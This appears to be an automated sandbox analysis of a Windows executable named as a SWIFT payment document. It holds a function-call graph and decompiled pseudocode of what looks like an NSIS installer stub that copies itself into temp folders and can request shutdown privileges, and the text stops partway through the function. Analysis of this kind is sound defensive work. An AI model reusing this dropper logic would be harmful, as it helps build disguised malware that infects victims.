3756 401fa4 3757 402da6 17 API calls 3756->3757 3758 401faa 3757->3758 3759 4056ca 24 API calls 3758->3759 3760 401fb4 3759->3760 3761 405c4b 2 API calls 3760->3761 3762 401fba 3761->3762 3763 401fdd CloseHandle 3762->3763 3767 40292e 3762->3767 3771 406ae0 WaitForSingleObject 3762->3771 3763->3767 3766 401fcf 3768 401fd4 3766->3768 3769 401fdf 3766->3769 3776 4065af wsprintfW 3768->3776 3769->3763 3772 406afa 3771->3772 3773 406b0c GetExitCodeProcess 3772->3773 3774 406a71 2 API calls 3772->3774 3773->3766 3775 406b01 WaitForSingleObject 3774->3775 3775->3772 3776->3763 3876 403c25 3877 403c40 3876->3877 3878 403c36 CloseHandle 3876->3878 3879 403c54 3877->3879 3880 403c4a CloseHandle 3877->3880 3878->3877 3885 403c82 3879->3885 3880->3879 3883 405d74 67 API calls 3884 403c65 3883->3884 3886 403c90 3885->3886 3887 403c59 3886->3887 3888 403c95 FreeLibrary GlobalFree 3886->3888 3887->3883 3888->3887 3888->3888 4561 40202a 4562 402da6 17 API calls 4561->4562 4563 402031 4562->4563 4564 406a35 5 API calls 4563->4564 4565 402040 4564->4565 4566 40205c GlobalAlloc 4565->4566 4567 4020cc 4565->4567 4566->4567 4568 402070 4566->4568 4569 406a35 5 API calls 4568->4569 4570 402077 4569->4570 4571 406a35 5 API calls 4570->4571 4572 402081 4571->4572 4572->4567 4576 4065af wsprintfW 4572->4576 4574 4020ba 4577 4065af wsprintfW 4574->4577 4576->4574 4577->4567 4578 40252a 4579 402de6 17 API calls 4578->4579 4580 402534 4579->4580 4581 402da6 17 API calls 4580->4581 4582 40253d 4581->4582 4583 402548 RegQueryValueExW 4582->4583 4586 40292e 4582->4586 4584 40256e RegCloseKey 4583->4584 4585 402568 4583->4585 4584->4586 4585->4584 4589 4065af wsprintfW 4585->4589 4589->4584 4590 4021aa 4591 402da6 17 API calls 4590->4591 4592 4021b1 4591->4592 4593 402da6 17 API calls 4592->4593 4594 4021bb 4593->4594 4595 402da6 17 API calls 4594->4595 4596 4021c5 4595->4596 4597 402da6 17 API calls 4596->4597 4598 4021cf 4597->4598 4599 402da6 17 API calls 4598->4599 4600 4021d9 4599->4600 4601 402218 CoCreateInstance 4600->4601 4602 402da6 17 API calls 4600->4602 4605 402237 4601->4605 4602->4601 4603 401423 24 API calls 4604 4022f6 4603->4604 4605->4603 4605->4604 4613 401a30 4614 402da6 17 API calls 4613->4614 4615 401a39 ExpandEnvironmentStringsW 4614->4615 4616 401a60 4615->4616 4617 401a4d 4615->4617 4617->4616 4618 401a52 lstrcmpW 4617->4618 4618->4616 4619 405031 GetDlgItem GetDlgItem 4620 405083 7 API calls 4619->4620 4621 4052a8 4619->4621 4622 40512a DeleteObject 4620->4622 4623 40511d SendMessageW 4620->4623 4626 40538a 4621->4626 4653 405317 4621->4653 4673 404f7f SendMessageW 4621->4673 4624 405133 4622->4624 4623->4622 4625 40516a 4624->4625 4629 4066a5 17 API calls 4624->4629 4627 4045c4 18 API calls 4625->4627 4628 405436 4626->4628 4632 40529b 4626->4632 4638 4053e3 SendMessageW 4626->4638 4631 40517e 4627->4631 4633 405440 SendMessageW 4628->4633 4634 405448 4628->4634 4630 40514c SendMessageW SendMessageW 4629->4630 4630->4624 4637 4045c4 18 API calls 4631->4637 4635 40462b 8 API calls 4632->4635 4633->4634 4641 405461 4634->4641 4642 40545a ImageList_Destroy 4634->4642 4649 405471 4634->4649 4640 405637 4635->4640 4654 40518f 4637->4654 4638->4632 4644 4053f8 SendMessageW 4638->4644 4639 40537c SendMessageW 4639->4626 4645 40546a GlobalFree 4641->4645 4641->4649 4642->4641 4643 4055eb 4643->4632 4650 4055fd ShowWindow GetDlgItem ShowWindow 4643->4650 4647 40540b 4644->4647 4645->4649 4646 40526a GetWindowLongW SetWindowLongW 4648 405283 4646->4648 4658 40541c SendMessageW 4647->4658 4651 4052a0 4648->4651 4652 405288 ShowWindow 4648->4652 4649->4643 4666 4054ac 4649->4666 4678 404fff 4649->4678 4650->4632 4672 4045f9 SendMessageW 4651->4672 4671 4045f9 SendMessageW 4652->4671 4653->4626 4653->4639 4654->4646 4657 4051e2 SendMessageW 4654->4657 4659 405265 4654->4659 4660 405220 SendMessageW 4654->4660 4661 405234 SendMessageW 4654->4661 4657->4654 4658->4628 4659->4646 4659->4648 4660->4654 4661->4654 4663 4055b6 4664 4055c1 InvalidateRect 4663->4664 4667 4055cd 4663->4667 4664->4667 4665 4054da SendMessageW 4669 4054f0 4665->4669 4666->4665 4666->4669 4667->4643 4687 404f3a 4667->4687 4668 405564 SendMessageW SendMessageW 4668->4669 4669->4663 4669->4668 4671->4632 4672->4621 4674 404fa2 GetMessagePos ScreenToClient SendMessageW 4673->4674 4675 404fde SendMessageW 4673->4675 4676 404fd6 4674->4676 4677 404fdb 4674->4677 4675->4676 4676->4653 4677->4675 4690 406668 lstrcpynW 4678->4690 4680 405012 4691 4065af wsprintfW 4680->4691 4682 40501c 4683 40140b 2 API calls 4682->4683 4684 405025 4683->4684 4692 406668 lstrcpynW 4684->4692 4686 40502c 4686->4666 4693 404e71 4687->4693 4689 404f4f 4689->4643 4690->4680 4691->4682 4692->4686 4694 404e8a 4693->4694 4695 4066a5 17 API calls 4694->4695 4696 404eee 4695->4696 4697 4066a5 17 API calls 4696->4697 4698 404ef9 4697->4698 4699 4066a5 17 API calls 4698->4699 4700 404f0f lstrlenW wsprintfW SetDlgItemTextW 4699->4700 4700->4689 4706 4023b2 4707 4023ba 4706->4707 4710 4023c0 4706->4710 4708 402da6 17 API calls 4707->4708 4708->4710 4709 4023ce 4712 4023dc 4709->4712 4713 402da6 17 API calls 4709->4713 4710->4709 4711 402da6 17 API calls 4710->4711 4711->4709 4714 402da6 17 API calls 4712->4714 4713->4712 4715 4023e5 WritePrivateProfileStringW 4714->4715 4716 404734 lstrlenW 4717 404753 4716->4717 4718 404755 WideCharToMultiByte 4716->4718 4717->4718 4719 402434 4720 402467 4719->4720 4721 40243c 4719->4721 4723 402da6 17 API calls 4720->4723 4722 402de6 17 API calls 4721->4722 4724 402443 4722->4724 4725 40246e 4723->4725 4727 402da6 17 API calls 4724->4727 4729 40247b 4724->4729 4730 402e64 4725->4730 4728 402454 RegDeleteValueW RegCloseKey 4727->4728 4728->4729 4731 402e78 4730->4731 4733 402e71 4730->4733 4731->4733 4734 402ea9 4731->4734 4733->4729 4735 4064d5 RegOpenKeyExW 4734->4735 4736 402ed7 4735->4736 4737 402ee7 RegEnumValueW 4736->4737 4744 402f81 4736->4744 4746 402f0a 4736->4746 4738 402f71 RegCloseKey 4737->4738 4737->4746 4738->4744 4739 402f46 RegEnumKeyW 4740 402f4f RegCloseKey 4739->4740 4739->4746 4741 406a35 5 API calls 4740->4741 4742 402f5f 4741->4742 4742->4744 4745 402f63 RegDeleteKeyW 4742->4745 4743 402ea9 6 API calls 4743->4746 4744->4733 4745->4744 4746->4738 4746->4739 4746->4740 4746->4743 4747 401735 4748 402da6 17 API calls 4747->4748 4749 40173c SearchPathW 4748->4749 4750 401757 4749->4750 4751 404ab5 4752 404ae1 4751->4752 4753 404af2 4751->4753 4812 405cac GetDlgItemTextW 4752->4812 4755 404afe GetDlgItem 4753->4755 4760 404b5d 4753->4760 4758 404b12 4755->4758 4756 404c41 4761 404df0 4756->4761 4814 405cac GetDlgItemTextW 4756->4814 4757 404aec 4759 4068ef 5 API calls 4757->4759 4763 404b26 SetWindowTextW 4758->4763 4764 405fe2 4 API calls 4758->4764 4759->4753 4760->4756 4760->4761 4765 4066a5 17 API calls 4760->4765 4768 40462b 8 API calls 4761->4768 4767 4045c4 18 API calls 4763->4767 4769 404b1c 4764->4769 4770 404bd1 SHBrowseForFolderW 4765->4770 4766 404c71 4771 40603f 18 API calls 4766->4771 4772 404b42 4767->4772 4773 404e04 4768->4773 4769->4763 4777 405f37 3 API calls 4769->4777 4770->4756 4774 404be9 CoTaskMemFree 4770->4774 4775 404c77 4771->4775 4776 4045c4 18 API calls 4772->4776 4778 405f37 3 API calls 4774->4778 4815 406668 lstrcpynW 4775->4815 4779 404b50 4776->4779 4777->4763 4780 404bf6 4778->4780 4813 4045f9 SendMessageW 4779->4813 4783 404c2d SetDlgItemTextW 4780->4783 4788 4066a5 17 API calls 4780->4788 4783->4756 4784 404b56 4786 406a35 5 API calls 4784->4786 4785 404c8e 4787 406a35 5 API calls 4785->4787 4786->4760 4794 404c95 4787->4794 4789 404c15 lstrcmpiW 4788->4789 4789->4783 4792 404c26 lstrcatW 4789->4792 4790 404cd6 4816 406668 lstrcpynW 4790->4816 4792->4783 4793 404cdd 4795 405fe2 4 API calls 4793->4795 4794->4790 4798 405f83 2 API calls 4794->4798 4800 404d2e 4794->4800 4796 404ce3 GetDiskFreeSpaceW 4795->4796 4799 404d07 MulDiv 4796->4799 4796->4800 4798->4794 4799->4800 4802 404f3a 20 API calls 4800->4802 4810 404d9f 4800->4810 4801 404dc2 4817 4045e6 EnableWindow 4801->4817 4804 404d8c 4802->4804 4803 40140b 2 API calls 4803->4801 4806 404da1 SetDlgItemTextW 4804->4806 4807 404d91 4804->4807 4806->4810 4808 404e71 20 API calls 4807->4808 4808->4810 4809 404dde 4809->4761 4811 404a0e SendMessageW 4809->4811 4810->4801 4810->4803 4811->4761 4812->4757 4813->4784 4814->4766 4815->4785 4816->4793 4817->4809 4818 401d38 4819 402d84 17 API calls 4818->4819 4820 401d3f 4819->4820 4821 402d84 17 API calls 4820->4821 4822 401d4b GetDlgItem 4821->4822 4823 402638 4822->4823 4824 4014b8 4825 4014be 4824->4825 4826 401389 2 API calls 4825->4826 4827 4014c6 4826->4827 4828 40563e 4829 405662 4828->4829 4830 40564e 4828->4830 4833 40566a IsWindowVisible 4829->4833 4839 405681 4829->4839 4831 405654 4830->4831 4832 4056ab 4830->4832 4835 404610 SendMessageW 4831->4835 4834 4056b0 CallWindowProcW 4832->4834 4833->4832 4836 405677 4833->4836 4837 40565e 4834->4837 4835->4837 4838 404f7f 5 API calls 4836->4838 4838->4839 4839->4834 4840 404fff 4 API calls 4839->4840 4840->4832 4841 40263e 4842 402652 4841->4842 4843 40266d 4841->4843 4844 402d84 17 API calls 4842->4844 4845 402672 4843->4845 4846 40269d 4843->4846 4855 402659 4844->4855 4848 402da6 17 API calls 4845->4848 4847 402da6 17 API calls 4846->4847 4850 4026a4 lstrlenW 4847->4850 4849 402679 4848->4849 4858 40668a WideCharToMultiByte 4849->4858 4850->4855 4852 40268d lstrlenA 4852->4855 4853 4026e7 4854 4026d1 4854->4853 4856 40620a WriteFile 4854->4856 4855->4853 4855->4854 4857 406239 5 API calls 4855->4857 4856->4853 4857->4854 4858->4852

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                                                  C-Code - Quality: 78%
                                                                                  			_entry_() {
                                                                                  				WCHAR* _v8;
                                                                                  				signed int _v12;
                                                                                  				void* _v16;
                                                                                  				signed int _v20;
                                                                                  				int _v24;
                                                                                  				int _v28;
                                                                                  				struct _TOKEN_PRIVILEGES _v40;
                                                                                  				signed char _v42;
                                                                                  				int _v44;
                                                                                  				signed int _v48;
                                                                                  				intOrPtr _v278;
                                                                                  				signed short _v310;
                                                                                  				struct _OSVERSIONINFOW _v324;
                                                                                  				struct _SHFILEINFOW _v1016;
                                                                                  				intOrPtr* _t88;
                                                                                  				WCHAR* _t92;
                                                                                  				char* _t94;
                                                                                  				void _t97;
                                                                                  				void* _t116;
                                                                                  				WCHAR* _t118;
                                                                                  				signed int _t119;
                                                                                  				intOrPtr* _t123;
                                                                                  				void* _t137;
                                                                                  				void* _t143;
                                                                                  				void* _t148;
                                                                                  				void* _t152;
                                                                                  				void* _t157;
                                                                                  				signed int _t167;
                                                                                  				void* _t170;
                                                                                  				void* _t175;
                                                                                  				intOrPtr _t177;
                                                                                  				intOrPtr _t178;
                                                                                  				intOrPtr* _t179;
                                                                                  				int _t188;
                                                                                  				void* _t189;
                                                                                  				void* _t198;
                                                                                  				signed int _t204;
                                                                                  				signed int _t209;
                                                                                  				signed int _t214;
                                                                                  				signed int _t216;
                                                                                  				int* _t218;
                                                                                  				signed int _t226;
                                                                                  				signed int _t229;
                                                                                  				CHAR* _t231;
                                                                                  				char* _t232;
                                                                                  				signed int _t233;
                                                                                  				WCHAR* _t234;
                                                                                  				void* _t250;
                                                                                  
                                                                                  				_t216 = 0x20;
                                                                                  				_t188 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                  				_v20 = 0;
                                                                                  				SetErrorMode(0x8001); // executed
                                                                                  				_v324.szCSDVersion = 0;
                                                                                  				_v48 = 0;
                                                                                  				_v44 = 0;
                                                                                  				_v324.dwOSVersionInfoSize = 0x11c;
                                                                                  				if(GetVersionExW( &_v324) == 0) {
                                                                                  					_v324.dwOSVersionInfoSize = 0x114;
                                                                                  					GetVersionExW( &_v324);
                                                                                  					asm("sbb eax, eax");
                                                                                  					_v42 = 4;
                                                                                  					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                                                  				}
                                                                                  				if(_v324.dwMajorVersion < 0xa) {
                                                                                  					_v310 = _v310 & 0x00000000;
                                                                                  				}
                                                                                  				 *0x42a318 = _v324.dwBuildNumber;
                                                                                  				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                                                  				if( *0x42a31e != 0x600) {
                                                                                  					_t179 = E00406A35(_t188);
                                                                                  					if(_t179 != _t188) {
                                                                                  						 *_t179(0xc00);
                                                                                  					}
                                                                                  				}
                                                                                  				_t231 = "UXTHEME";
                                                                                  				do {
                                                                                  					E004069C5(_t231); // executed
                                                                                  					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                                                                                  				} while ( *_t231 != 0);
                                                                                  				E00406A35(0xb);
                                                                                  				 *0x42a264 = E00406A35(9);
                                                                                  				_t88 = E00406A35(7);
                                                                                  				if(_t88 != _t188) {
                                                                                  					_t88 =  *_t88(0x1e);
                                                                                  					if(_t88 != 0) {
                                                                                  						 *0x42a31c =  *0x42a31c | 0x00000080;
                                                                                  					}
                                                                                  				}
                                                                                  				__imp__#17();
                                                                                  				__imp__OleInitialize(_t188); // executed
                                                                                  				 *0x42a320 = _t88;
                                                                                  				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
                                                                                  				E00406668(0x429260, L"NSIS Error");
                                                                                  				_t92 = GetCommandLineW();
                                                                                  				_t232 = L"\"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe\" ";
                                                                                  				E00406668(_t232, _t92);
                                                                                  				_t94 = _t232;
                                                                                  				_t233 = 0x22;
                                                                                  				 *0x42a260 = 0x400000;
                                                                                  				_t250 = L"\"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe\" " - _t233; // 0x22
                                                                                  				if(_t250 == 0) {
                                                                                  					_t216 = _t233;
                                                                                  					_t94 =  &M00435002;
                                                                                  				}
                                                                                  				_t198 = CharNextW(E00405F64(_t94, _t216));
                                                                                  				_v16 = _t198;
                                                                                  				while(1) {
                                                                                  					_t97 =  *_t198;
                                                                                  					_t251 = _t97 - _t188;
                                                                                  					if(_t97 == _t188) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_t209 = 0x20;
                                                                                  					__eflags = _t97 - _t209;
                                                                                  					if(_t97 != _t209) {
                                                                                  						L17:
                                                                                  						__eflags =  *_t198 - _t233;
                                                                                  						_v12 = _t209;
                                                                                  						if( *_t198 == _t233) {
                                                                                  							_v12 = _t233;
                                                                                  							_t198 = _t198 + 2;
                                                                                  							__eflags = _t198;
                                                                                  						}
                                                                                  						__eflags =  *_t198 - 0x2f;
                                                                                  						if( *_t198 != 0x2f) {
                                                                                  							L32:
                                                                                  							_t198 = E00405F64(_t198, _v12);
                                                                                  							__eflags =  *_t198 - _t233;
                                                                                  							if(__eflags == 0) {
                                                                                  								_t198 = _t198 + 2;
                                                                                  								__eflags = _t198;
                                                                                  							}
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							_t198 = _t198 + 2;
                                                                                  							__eflags =  *_t198 - 0x53;
                                                                                  							if( *_t198 != 0x53) {
                                                                                  								L24:
                                                                                  								asm("cdq");
                                                                                  								asm("cdq");
                                                                                  								_t214 = L"NCRC" & 0x0000ffff;
                                                                                  								asm("cdq");
                                                                                  								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                                                                                  								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                                                                                  								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                                                                                  									L29:
                                                                                  									asm("cdq");
                                                                                  									asm("cdq");
                                                                                  									_t209 = L" /D=" & 0x0000ffff;
                                                                                  									asm("cdq");
                                                                                  									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                                                                                  									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                                                                                  									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                                                                                  										L31:
                                                                                  										_t233 = 0x22;
                                                                                  										goto L32;
                                                                                  									}
                                                                                  									__eflags =  *_t198 - _t229;
                                                                                  									if( *_t198 == _t229) {
                                                                                  										 *(_t198 - 4) = _t188;
                                                                                  										__eflags = _t198;
                                                                                  										E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t198);
                                                                                  										L37:
                                                                                  										_t234 = L"C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                                                                                  										GetTempPathW(0x400, _t234);
                                                                                  										_t116 = E0040360F(_t198, _t251);
                                                                                  										_t252 = _t116;
                                                                                  										if(_t116 != 0) {
                                                                                  											L40:
                                                                                  											DeleteFileW(L"1033"); // executed
                                                                                  											_t118 = E004030D0(_t254, _v20); // executed
                                                                                  											_v8 = _t118;
                                                                                  											if(_t118 != _t188) {
                                                                                  												L68:
                                                                                  												ExitProcess(); // executed
                                                                                  												__imp__OleUninitialize(); // executed
                                                                                  												if(_v8 == _t188) {
                                                                                  													if( *0x42a2f4 == _t188) {
                                                                                  														L77:
                                                                                  														_t119 =  *0x42a30c;
                                                                                  														if(_t119 != 0xffffffff) {
                                                                                  															_v24 = _t119;
                                                                                  														}
                                                                                  														ExitProcess(_v24);
                                                                                  													}
                                                                                  													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                                                  														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                                                  														_v40.PrivilegeCount = 1;
                                                                                  														_v28 = 2;
                                                                                  														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                                                                                  													}
                                                                                  													_t123 = E00406A35(4);
                                                                                  													if(_t123 == _t188) {
                                                                                  														L75:
                                                                                  														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                                                  															goto L77;
                                                                                  														}
                                                                                  														goto L76;
                                                                                  													} else {
                                                                                  														_push(0x80040002);
                                                                                  														_push(0x25);
                                                                                  														_push(_t188);
                                                                                  														_push(_t188);
                                                                                  														_push(_t188);
                                                                                  														if( *_t123() == 0) {
                                                                                  															L76:
                                                                                  															E0040140B(9);
                                                                                  															goto L77;
                                                                                  														}
                                                                                  														goto L75;
                                                                                  													}
                                                                                  												}
                                                                                  												E00405CC8(_v8, 0x200010);
                                                                                  												ExitProcess(2);
                                                                                  											}
                                                                                  											if( *0x42a27c == _t188) {
                                                                                  												L51:
                                                                                  												 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                                                  												_v24 = E00403D17(_t264);
                                                                                  												goto L68;
                                                                                  											}
                                                                                  											_t218 = E00405F64(L"\"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe\" ", _t188);
                                                                                  											if(_t218 < L"\"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe\" ") {
                                                                                  												L48:
                                                                                  												_t263 = _t218 - L"\"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe\" ";
                                                                                  												_v8 = L"Error launching installer";
                                                                                  												if(_t218 < L"\"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe\" ") {
                                                                                  													_t189 = E00405C33(__eflags);
                                                                                  													lstrcatW(_t234, L"~nsu");
                                                                                  													__eflags = _t189;
                                                                                  													if(_t189 != 0) {
                                                                                  														lstrcatW(_t234, "A");
                                                                                  													}
                                                                                  													lstrcatW(_t234, L".tmp");
                                                                                  													_t219 = L"C:\\Users\\engineer\\AppData\\Roaming";
                                                                                  													_t137 = lstrcmpiW(_t234, L"C:\\Users\\engineer\\AppData\\Roaming");
                                                                                  													__eflags = _t137;
                                                                                  													if(_t137 == 0) {
                                                                                  														L67:
                                                                                  														_t188 = 0;
                                                                                  														__eflags = 0;
                                                                                  														goto L68;
                                                                                  													} else {
                                                                                  														__eflags = _t189;
                                                                                  														_push(_t234);
                                                                                  														if(_t189 == 0) {
                                                                                  															E00405C16();
                                                                                  														} else {
                                                                                  															E00405B99();
                                                                                  														}
                                                                                  														SetCurrentDirectoryW(_t234);
                                                                                  														__eflags = L"C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
                                                                                  														if(__eflags == 0) {
                                                                                  															E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t219);
                                                                                  														}
                                                                                  														E00406668(0x42b000, _v16);
                                                                                  														_t201 = "A" & 0x0000ffff;
                                                                                  														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                  														__eflags = _t143;
                                                                                  														_v12 = 0x1a;
                                                                                  														 *0x42b800 = _t143;
                                                                                  														do {
                                                                                  															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                                                                                  															DeleteFileW(0x420f08);
                                                                                  															__eflags = _v8;
                                                                                  															if(_v8 != 0) {
                                                                                  																_t148 = CopyFileW(L"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe", 0x420f08, 1);
                                                                                  																__eflags = _t148;
                                                                                  																if(_t148 != 0) {
                                                                                  																	E00406428(_t201, 0x420f08, 0);
                                                                                  																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                                                                                  																	_t152 = E00405C4B(0x420f08);
                                                                                  																	__eflags = _t152;
                                                                                  																	if(_t152 != 0) {
                                                                                  																		CloseHandle(_t152);
                                                                                  																		_v8 = 0;
                                                                                  																	}
                                                                                  																}
                                                                                  															}
                                                                                  															 *0x42b800 =  *0x42b800 + 1;
                                                                                  															_t61 =  &_v12;
                                                                                  															 *_t61 = _v12 - 1;
                                                                                  															__eflags =  *_t61;
                                                                                  														} while ( *_t61 != 0);
                                                                                  														E00406428(_t201, _t234, 0);
                                                                                  														goto L67;
                                                                                  													}
                                                                                  												}
                                                                                  												 *_t218 = _t188;
                                                                                  												_t221 =  &(_t218[2]);
                                                                                  												_t157 = E0040603F(_t263,  &(_t218[2]));
                                                                                  												_t264 = _t157;
                                                                                  												if(_t157 == 0) {
                                                                                  													goto L68;
                                                                                  												}
                                                                                  												E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t221);
                                                                                  												E00406668(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t221);
                                                                                  												_v8 = _t188;
                                                                                  												goto L51;
                                                                                  											}
                                                                                  											asm("cdq");
                                                                                  											asm("cdq");
                                                                                  											asm("cdq");
                                                                                  											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                  											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                                                  											while( *_t218 != _t204 || _t218[1] != _t167) {
                                                                                  												_t218 = _t218;
                                                                                  												if(_t218 >= L"\"C:\\Users\\engineer\\AppData\\Roaming\\SWIFT MO104978172_1301 EURO 9700.exe\" ") {
                                                                                  													continue;
                                                                                  												}
                                                                                  												break;
                                                                                  											}
                                                                                  											_t188 = 0;
                                                                                  											goto L48;
                                                                                  										}
                                                                                  										GetWindowsDirectoryW(_t234, 0x3fb);
                                                                                  										lstrcatW(_t234, L"\\Temp");
                                                                                  										_t170 = E0040360F(_t198, _t252);
                                                                                  										_t253 = _t170;
                                                                                  										if(_t170 != 0) {
                                                                                  											goto L40;
                                                                                  										}
                                                                                  										GetTempPathW(0x3fc, _t234);
                                                                                  										lstrcatW(_t234, L"Low");
                                                                                  										SetEnvironmentVariableW(L"TEMP", _t234);
                                                                                  										SetEnvironmentVariableW(L"TMP", _t234);
                                                                                  										_t175 = E0040360F(_t198, _t253);
                                                                                  										_t254 = _t175;
                                                                                  										if(_t175 == 0) {
                                                                                  											goto L68;
                                                                                  										}
                                                                                  										goto L40;
                                                                                  									}
                                                                                  									goto L31;
                                                                                  								}
                                                                                  								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                                                                                  								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                                                                                  									goto L29;
                                                                                  								}
                                                                                  								_t177 =  *((intOrPtr*)(_t198 + 8));
                                                                                  								__eflags = _t177 - 0x20;
                                                                                  								if(_t177 == 0x20) {
                                                                                  									L28:
                                                                                  									_t36 =  &_v20;
                                                                                  									 *_t36 = _v20 | 0x00000004;
                                                                                  									__eflags =  *_t36;
                                                                                  									goto L29;
                                                                                  								}
                                                                                  								__eflags = _t177 - _t188;
                                                                                  								if(_t177 != _t188) {
                                                                                  									goto L29;
                                                                                  								}
                                                                                  								goto L28;
                                                                                  							}
                                                                                  							_t178 =  *((intOrPtr*)(_t198 + 2));
                                                                                  							__eflags = _t178 - _t209;
